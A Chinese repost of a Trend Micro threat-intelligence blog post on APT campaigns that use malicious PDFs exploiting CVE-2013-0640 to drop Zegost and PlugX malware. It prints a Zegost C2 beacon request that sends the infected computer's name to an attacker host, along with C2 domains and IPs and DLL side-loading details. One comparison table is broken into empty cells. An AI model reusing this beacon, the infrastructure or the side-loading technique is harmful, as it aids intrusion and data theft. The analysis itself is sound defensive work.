加载中…隐藏在 PDF 中的 APT 攻击代码
(2013-05-17 14:49:54)
标签:
it |
作者:趋势科技
在 2012 年,我们看到了各式各样的 APT 攻击活动利用 Microsoft Word 的漏洞 – CVE-2012-0158。这是一种转变,之前最常被利用的 Word 漏洞是 CVE-2010-3333。虽然我们还是继续看到 CVE-2012-0158 被大量的使用,但我们也注意到恶名昭彰的 MiniDuke 攻击所制造的针对 Adobe Reader 漏洞 – CVE-2013-0640 的攻击程序代码使用量正在增加。这些恶意 PDF 文件所植入的恶意软件和 MiniDuke 并无关系,但却和正在进行中的 APT-高级持续性渗透攻击活动有关。
http://blog.iqushi.com/wp-content/uploads/2013/05/13.jpg
通过恶意 PDF 攻击程序代码进行的 APT 攻击正在大量增加
Zegost
趋势科技所发现的一组恶意 PDF 文件,包含上述漏洞攻击码的诱饵,使用了越南文,文件名也是相同的语言。
http://blog.iqushi.com/wp-content/uploads/2013/05/22-300x208.jpg
图一、诱饵文件样本
这些 PDF 文件内嵌与 MiniDuke 攻击活动类似的 JavaScript 程序代码。相似之处包括了类似的函数和变量名。
http://blog.iqushi.com/wp-content/uploads/2013/05/31-300x168.jpg
图二、类似的 JavaScript 程序代码
使用 Didier Steven 的 PDFiD 工具分析该 PDF 文件发现,这两个 PDF 文件非常相似。虽然并非完全相同,但两者之间的相似之处是难以否认的。有意思的地方是「/Javascript」、「/OpenAction」和 「/Page」。这些地方分别代表有 JavaScript 出现,有某种自动行为出现和页码的具体信息。这三个项目可以帮我们确认 MiniDuke 和 Zegost 的相似之处。
植入的文件和数据也差不多。这两种攻击活动都植入了相同数量的文件,有着非常相似的文件名与类似的目的。即使注册表的修改部分也很类似。
不过这也是所有相似之处。这些 PDF 所植入的文件被称为 Zegost(或 HTTPTunnel),曾经在之前的攻击里发现过。和 MiniDuke 攻击所植入的恶意软件并无关联。Zegost 恶意软件有个鲜明的特征:
GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not httptunnel] HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: dns.yimg.ca
Cache-Control: no-cache
命令和控制服务器 – dns.yimg.ca 所反查出的 IP – 223.26.55.122,一直被用在比较知名的命令和控制服务器上,例如 imm.conimes.com 和 iyy.conimes.com。用来注册该域名的电子邮件地址 – llssddzz@gmail.com,也曾被用来注册 scvhosts.com(另外一个已知的 C&C 服务器器)和 updata-microsoft.com,应该也是有问题的域名。
PlugX
第二组恶意 PDF 文件间并不一定都直接有关联,虽然它们都会值入不同的 PlugX 变种。我们所分析的攻击似乎主要针对日本、韩国和印度的目标。
然而虽然这些攻击也利用了漏洞 – CVE-2013-0640,但是它们和上面所讨论的样本不同。比较文件时就可以看出差异,例如使用的 PDF 格式版本:
| Zegost | MiniDuke | PlugX |
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
|
|
PlugX 也会植入文件和数据,但是却和 Zegost 或 MiniDuke 都不相同。文件数量不同,植入原因也不同。
| Zegost | MiniDuke | PlugX |
| UserCache.bin | UserCache.bin | UserCache.bin |
| 39f5d27d1a5e34ce9863406b |
39f5d27d1a5e34ce9863406b |
39f5d27d1a5e34ce9863406b |
| ACECache10.lst | ACECache10.lst | ACECache10.lst |
| a1bb36552f1336466b4d7289 |
77402ee32c656d68eeb8a07e |
77e16369d995628ff9df31c5 |
| A9RD50B.tmp (PDF) | A9RE077.tmp (PDF) | SharedDataEvents |
| dd28e2e06465464f0cb5eca4 |
85b890c0b10faa13014d4a22 |
1a8d23271be2c45f31a537ea |
| A9RD50A.tmp (PDF) | A9RE078.tmp (PDF) | SharedDataEvents-journal |
| 4f4ceedd8da84be88dbea7b4 |
e719894252665a7cbf8efc18 |
4754e6d5ea3b6ca2357146a1 |
| SharedDataEvents-journal | ||
| b16f24e72c42059cd44a9fb4 |
||
| A9RD53D.tmp (PDF) | ||
| 200569e47e6e5a3f62953342 |
||
| SharedDataEvents-journal | ||
| b930ef3a77e6c4669312f582 |
||
| SharedDataEvents-journal | ||
| 38149cfb66075a9009d460e8 |
||
| SharedDataEvents-journal | ||
| 566ea4be505009d422d5fd6c |
||
| A9RD53C.tmp (PDF) | ||
| ca79b7a45410dd1e995a4997 |
PlugX:HHX
PlugX 的第一组变种会利用 Microsoft HTML 辅助说明编译程序,就如同这篇文章所描述的一样。我们已经看到这变种被用在目标攻击活动中。在这个案例中,攻击者对目标发送了一封电子邮件,诱使他们打开恶意附件文件。
我们所分析的样本会将文件植入文件夹 hhx 中,并且利用正常的 Microsoft 文件 hhx.exe 载入 hha.dll,接着再载入 hha.dll.bak。我们分析文件所使用的命令和控制服务器是 14.102.252.142。
PlugX:PDH
我们所分析的第二组 PlugX 变种,会将文件植入到文件夹 PDH 中,并且利用已经签名过的 QQ 浏览器更新服务文件载入 PDH.dll,接着会载入 PDH.pak。
http://blog.iqushi.com/wp-content/uploads/2013/05/4-300x286.jpg
图三、签名过的文件
这些文件会利用 dnsport.chatnook.com、inter.so-webmail.com 和 223.25.242.45 做为命令和控制服务器。
结论
趋势科技的研究显示这些 APT 活动的攻击者开始利用 MiniDuke 攻击活动所制造的漏洞攻击码,并将其加入到自己的军火库中。与此同时,我们也发现似乎有其他 APT 攻击活动已经开发出自己的方式来利用相同的漏洞。攻击漏洞 – CVE-2013-0640 的恶意 PDF 数量增加,也代表了 APT 攻击者从使用恶意 Word 档案攻击相对老旧的漏洞 – CVE-2012-0158 开始转移阵地了。
@原文出处:Malicious PDFs On The Rise
本文版权为趋势科技所有,对于非赢利网站或媒体转载请注明作者以及原文链接。谢谢合作!
| http://www.iqushi.com/images/blog_1.jpgPDF |
http://www.iqushi.com/images/blog_2.jpgPDF |
|
| http://www.iqushi.com/images/blog_3.jpgPDF |
http://www.iqushi.com/images/blog_4.jpgPDF |
http://www.iqushi.com/images/blog_5.jpgPDF http://www.iqushi.com/images/blog_6.jpgPDF |
喜欢
0
赠金笔